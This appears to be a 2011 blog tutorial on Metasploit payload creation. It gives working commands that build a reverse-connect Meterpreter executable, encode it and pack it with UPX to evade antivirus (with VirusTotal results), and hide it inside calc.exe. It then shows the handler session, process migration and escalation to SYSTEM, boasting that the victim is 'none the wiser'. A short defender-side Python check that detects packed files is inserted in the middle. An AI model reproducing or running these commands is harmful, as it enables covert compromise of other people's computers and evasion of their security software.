Payload Creation


I’m going to jump ahead a bit this month. I’ve been attending the Offensive-Security Ohio Chapter meetings, hosted by Offensive-Security and Diebold, Incorporated, and led by ReL1K. If you have the means and you’re just getting into the business of ethical hacking, I highly recommend attending. If you’re not in the area, the last meeting was streamed via USTREAM, so check the Offensive-Security site for details.

At the first two meetings, we learned the basics of Metasploit, Fast-Track, and SET.  I’m just going to cover the topic of creating a payload and encoding it to avoid detection from anti-virus.

First, we use “msfpayload” to dump the shellcode that will produce a reverse (connect-back) Meterpreter session. Meterpreter is the holy grail of Metasploit. It allows us to easily upload/download files and run commands, steal access tokens, disable AV, enable RDP and much, much more. Because the victim initiates the connection back to us, the reverse payload can traverse a NAT environment; we just need to assign a port that we know will pass any egress filter, such as 80 or 443. Here is the command that we use to create the raw data:

cd /pentest/exploits/framework3
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.0.147 lport=443 R > moo.raw

Next, we create an executable from the raw dump and encode it with five iterations of “Shikata ga nai” (Japanese for “it can’t be helped” or “nothing can be done about it”). It is a polymorphic encoder, so each run produces a different byte sequence for the same shellcode; we use it to avoid signature-based detection from AV.

msfencode -i moo.raw -o moo.exe -e x86/shikata_ga_nai -c 5 -t exe

Let’s put this executable to the test. VirusTotal is an excellent site that allows you to upload a file, which it will then scan using numerous anti-virus engines. Here are the results for moo.exe:

Antivirus             Version         Last update  Result
---------             -------         -----------  ------
AhnLab-V3             2011.03.20.00   2011.03.19   Trojan/Win32.Shell
AntiVir               7.11.5.1        2011.03.18   TR/Crypt.EPACK.Gen2
Antiy-AVL             2.0.3.7         2011.03.19
Avast                 4.8.1351.0      2011.03.19   Win32:SwPatch
Avast5                5.0.677.0       2011.03.19   Win32:SwPatch
AVG                   10.0.0.1190     2011.03.19   Win32/Heur
BitDefender           7.2             2011.03.19   Backdoor.Shell.AC
CAT-QuickHeal         11.00           2011.03.19   Win32.Trojan.Swrort.A.4
ClamAV                0.96.4.0        2011.03.19
Commtouch             5.2.11.5        2011.03.19   W32/Swrort.A.gen!Eldorado
Comodo                8042            2011.03.19
DrWeb                 5.0.2.03300     2011.03.19
Emsisoft              5.1.0.2         2011.03.19
eSafe                 7.0.17.0        2011.03.17
eTrust-Vet            36.1.8223       2011.03.18   Win32/Swrort.A!generic
F-Prot                4.6.2.117       2011.03.19   W32/Swrort.A.gen!Eldorado
F-Secure              9.0.16440.0     2011.03.19   Backdoor.Shell.AC
Fortinet              4.2.254.0       2011.03.19
GData                 21              2011.03.19   Backdoor.Shell.AC
Ikarus                T3.1.1.97.0     2011.03.19
Jiangmin              13.0.900        2011.03.18
K7AntiVirus           9.94.4155       2011.03.19   Riskware
Kaspersky             7.0.0.125       2011.03.19
McAfee                5.400.0.1158    2011.03.19
McAfee-GW-Edition     2010.1C         2011.03.19
Microsoft             1.6603          2011.03.19   Trojan:Win32/Swrort.A
NOD32                 5968            2011.03.19   a variant of Win32/Rozena.AH
Norman                6.07.03         2011.03.19
nProtect              2011-02-10.01   2011.02.15   Backdoor.Shell.AC
Panda                 10.0.3.5        2011.03.19   Suspicious file
PCTools               7.0.3.5         2011.03.19
Prevx                 3.0             2011.03.20
Rising                23.49.04.05     2011.03.18
Sophos                4.63.0          2011.03.20   Mal/Swrort-C
SUPERAntiSpyware      4.40.0.1006     2011.03.19   Trojan.Backdoor-PoisonIvy
Symantec              20101.3.0.103   2011.03.19
TheHacker             6.7.0.1.152     2011.03.19
TrendMicro            9.200.0.1012    2011.03.19
TrendMicro-HouseCall  9.200.0.1012    2011.03.19
VBA32                 3.12.14.3       2011.03.18
VIPRE                 8758            2011.03.20   Trojan.Win32.Swrort.B (v)
ViRobot               2011.3.19.4366  2011.03.19
VirusBuster           13.6.258.0      2011.03.19   Trojan.Rosena.Gen.1

Not bad, but hopefully we can do better. Another trick ReL1K taught us was to use the UPX packer, which compresses the executable and will further help us avoid being detected. Here is the command to create a “packed” executable, followed by the VirusTotal results for it:

/pentest/database/sqlmap/lib/contrib/upx/linux/upx -9 -o moo_packed.exe moo.exe

Antivirus             Version         Last update  Result
---------             -------         -----------  ------
AhnLab-V3             2011.03.20.00   2011.03.19
AntiVir               7.11.5.1        2011.03.18   TR/Crypt.ZPACK.Gen
Antiy-AVL             2.0.3.7         2011.03.19
Avast                 4.8.1351.0      2011.03.19
Avast5                5.0.677.0       2011.03.19
AVG                   10.0.0.1190     2011.03.20   Win32/Heur
BitDefender           7.2             2011.03.19   Gen:Variant.Kazy.7277
CAT-QuickHeal         11.00           2011.03.19
ClamAV                0.96.4.0        2011.03.19
Commtouch             5.2.11.5        2011.03.19
Comodo                8042            2011.03.19
DrWeb                 5.0.2.03300     2011.03.19
Emsisoft              5.1.0.2         2011.03.20
eSafe                 7.0.17.0        2011.03.17
eTrust-Vet            36.1.8223       2011.03.18
F-Prot                4.6.2.117       2011.03.19
F-Secure              9.0.16440.0     2011.03.19   Gen:Variant.Kazy.7277
Fortinet              4.2.254.0       2011.03.19
GData                 21              2011.03.19   Gen:Variant.Kazy.7277
Ikarus                T3.1.1.97.0     2011.03.19
Jiangmin              13.0.900        2011.03.18
K7AntiVirus           9.94.4155       2011.03.19
Kaspersky             7.0.0.125       2011.03.19
McAfee                5.400.0.1158    2011.03.19
McAfee-GW-Edition     2010.1C         2011.03.19
Microsoft             1.6603          2011.03.19
NOD32                 5968            2011.03.19
Norman                6.07.03         2011.03.19
nProtect              2011-02-10.01   2011.02.15   Gen:Variant.Kazy.7277
Panda                 10.0.3.5        2011.03.19   Suspicious file
PCTools               7.0.3.5         2011.03.19
Prevx                 3.0             2011.03.20
Rising                23.49.04.05     2011.03.18
Sophos                4.63.0          2011.03.20
SUPERAntiSpyware      4.40.0.1006     2011.03.19
Symantec              20101.3.0.103   2011.03.20   Suspicious.MH690.A
TheHacker             6.7.0.1.152     2011.03.19
TrendMicro            9.200.0.1012    2011.03.19   PAK_Generic.001
TrendMicro-HouseCall  9.200.0.1012    2011.03.20   PAK_Generic.001
VBA32                 3.12.14.3       2011.03.18
VIPRE                 8758            2011.03.20
ViRobot               2011.3.19.4366  2011.03.19
VirusBuster           13.6.258.0      2011.03.19

It’s not perfect, but definitely better.  There’s always going to be a cat-and-mouse game between the hackers and the anti-virus vendors.
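To see the other side of that cat-and-mouse game, here is a defender-side check for the packing step above. It is an added example, not code from the original post or from UPX or Metasploit: the UPX section names and the high byte entropy of a compressed section are exactly the traits that generic "packed file" verdicts such as PAK_Generic or Suspicious key on. The minimal PE parser, the 7.0 bits/byte threshold and the two sample images are my own constructions.

```python
import math
import struct
from collections import Counter
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}  # section names the UPX packer writes

def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for constant or empty data, 8.0 for uniformly distributed bytes."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def pe_sections(image: bytes):
    """Yield (name, raw_bytes) for every entry in a PE section table (minimal parser)."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4                                   # COFF file header (20 bytes)
    _, num_sections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    table = coff + 20 + opt_size                          # section table follows the optional header
    for i in range(num_sections):
        hdr = table + 40 * i                              # IMAGE_SECTION_HEADER is 40 bytes
        raw_size, raw_ptr = struct.unpack_from("<II", image, hdr + 16)
        yield image[hdr:hdr + 8].rstrip(b"\0"), image[raw_ptr:raw_ptr + raw_size]

def packer_indicators(image: bytes, threshold: float = 7.0) -> dict:
    """Flag UPX section names and any non-empty section whose entropy reaches the threshold."""
    found = {"upx_sections": [], "high_entropy_sections": [], "section_entropy": {}}
    for name, data in pe_sections(image):
        label, ent = name.decode("ascii", "replace"), shannon_entropy(data)
        found["section_entropy"][label] = round(ent, 2)
        if name in UPX_SECTION_NAMES:
            found["upx_sections"].append(label)
        if data and ent >= threshold:
            found["high_entropy_sections"].append(label)
    return {**found, "likely_packed": bool(found["upx_sections"] or found["high_entropy_sections"])}

def build_sample_pe(sections) -> bytes:
    """Constructed test data: a minimal PE image (headers plus section bodies, not a runnable program)."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)                     # e_lfanew -> 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)  # SizeOfOptionalHeader = 0
    table, body, raw_ptr = b"", b"", 0x40 + 4 + 20 + 40 * len(sections)
    for name, data in sections:
        table += name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", len(data), 0, len(data), raw_ptr, 0, 0, 0, 0, 0x60000020)
        body, raw_ptr = body + data, raw_ptr + len(data)
    return dos + b"PE\0\0" + coff + table + body

# Constructed samples: a UPX-style layout with one high-entropy section, and a plain layout.
SAMPLE_PACKED = build_sample_pe([(b"UPX0", b""), (b"UPX1", bytes(range(256)) * 4), (b".rsrc", b"A" * 128)])
SAMPLE_PLAIN = build_sample_pe([(b".text", bytes(range(64)) * 4), (b".data", b"\0" * 256)])
```

Run `packer_indicators(open(path, "rb").read())` against a real executable to get its per-section entropy; renaming the UPX sections defeats the name check but not the entropy check, which is why packers alone rarely make a file look clean.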

One more trick.  What if we want to attach the Meterpreter payload to a known good executable, such as “calc.exe”?  Here’s a quick one-liner.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.147 LPORT=443 R | msfencode -x ./calc.exe -k -e x86/shikata_ga_nai -c 5 -t exe -o payload_calc.exe

Then we just need to set up a listener using Metasploit’s “multi/handler”, copy “payload_calc.exe” to the victim machine and execute it.

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.147
LHOST => 192.168.0.147
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.147:443
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (749056 bytes) to 192.168.0.123
[*] Meterpreter session 1 opened (192.168.0.147:443 -> 192.168.0.123:1089) at Mon Mar 21 17:17:07 -0400 2011

msf exploit(handler) > sessions -i

Active sessions
===============

 Id  Type                   Information               Connection
 --  ----                   -----------               ----------
 1   meterpreter x86/win32  BUDLITE\spohnl @ BUDLITE  192.168.0.147:443 -> 192.168.0.123:1089

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Booya! We have a Meterpreter session and the victim is none the wiser. As a final step, we’ll want to migrate the Meterpreter session out of the calc process so we keep our session after calc is closed. Oh, and don’t forget to upgrade your access to SYSTEM!

meterpreter > ps

Process list
============

 PID   Name                 Arch  Session  User                 Path
 ---   ----                 ----  -------  ----                 ----
 0     [System Process]
 4     System               x86   0
 540   smss.exe             x86   0        NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe
 612   csrss.exe            x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\csrss.exe
 636   winlogon.exe         x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\winlogon.exe
 680   services.exe         x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\services.exe
 692   lsass.exe            x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\lsass.exe
 848   vmacthlp.exe         x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 864   svchost.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\svchost.exe
 940   svchost.exe          x86   0                             C:\WINDOWS\system32\svchost.exe
 1044  svchost.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe
 1120  svchost.exe          x86   0                             C:\WINDOWS\system32\svchost.exe
 1288  svchost.exe          x86   0                             C:\WINDOWS\system32\svchost.exe
 1436  explorer.exe         x86   0        BUDLITE\spohnl       C:\WINDOWS\Explorer.EXE
 1532  spoolsv.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\spoolsv.exe
 1720  VMwareTray.exe       x86   0        BUDLITE\spohnl       C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 1736  VMwareUser.exe       x86   0        BUDLITE\spohnl       C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 1892  inetinfo.exe         x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\inetsrv\inetinfo.exe
 1940  sqlservr.exe         x86   0        NT AUTHORITY\SYSTEM  c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
 224   snmp.exe             x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\snmp.exe
 244   sqlbrowser.exe       x86   0        NT AUTHORITY\SYSTEM  c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
 336   vmtoolsd.exe         x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 376   VMUpgradeHelper.exe  x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
 2148  alg.exe              x86   0                             C:\WINDOWS\System32\alg.exe
 3364  wuauclt.exe          x86   0        BUDLITE\spohnl       C:\WINDOWS\system32\wuauclt.exe
 3372  cmd.exe              x86   0        BUDLITE\spohnl       C:\WINDOWS\system32\cmd.exe
 2508  svchost.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe
 3700  payload_calc.exe     x86   0        BUDLITE\spohnl       C:\WINDOWS\system32\payload_calc.exe

meterpreter > migrate 1436
[*] Migrating to 1436...
[*] Migration completed successfully.
meterpreter > getuid
Server username: BUDLITE\spohnl
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

That’s all there is to it.  Now you can have your way with this system!
